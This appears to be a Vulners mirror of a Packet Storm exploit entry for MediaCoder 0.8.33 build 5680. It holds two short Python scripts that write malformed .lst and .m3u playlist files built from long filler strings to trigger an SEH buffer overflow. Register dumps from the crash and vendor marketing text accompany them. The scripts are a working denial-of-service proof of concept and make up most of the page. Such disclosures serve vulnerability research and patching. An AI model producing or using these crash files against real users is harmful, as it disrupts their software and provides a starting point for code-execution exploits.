Lucene search
K

Mediacoder 0.8.33 Build 5680 Buffer Overflow / DoS

🗓️ 17 Dec 2014 00:00:00Reported by Hadji SamirType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Mediacoder 0.8.33 SEH Buffer Overflow Exploi

Code
`# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)  
# Date: 11/29/2010  
# Author: Hadji Samir [email protected]  
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe  
# Version: 0.8.33 build 5680  
  
EAX 0012E788  
ECX 43434343  
EDX 00000000  
EBX 43434343  
ESP 0012E724  
EBP 0012E774  
ESI 0012E788  
EDI 00000000  
  
#!/usr/bin/python  
  
buffer = ("http://" + "A" * 845)  
nseh = ("B" * 4)  
seh = ("C" * 4)  
junk = ("D" * 60)  
  
f= open("exploit.lst",'w')  
f.write(buffer + nseh + seh + junk)  
f.close()  
  
-------------------  
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)  
# Date: 11/29/2010  
# Author: Hadji Samir [email protected]  
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe  
# Version: 0.8.33 build 5680  
  
EAX 0012E508  
ECX 43434343  
EDX 00000000  
EBX 43434343  
ESP 0012E4A4  
EBP 0012E4F4  
ESI 0012E508  
EDI 00000000  
  
#!/usr/bin/python  
buffer = ("http://" + "A" * 845)  
nseh = ("B" * 4)  
seh = ("C" * 4)  
junk = ("D" * 60)  
  
f= open("exploit.m3u",'w')  
f.write(buffer + nseh + seh + junk)  
f.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Dec 2014 00:00Current
1Low risk
Vulners AI Score1
22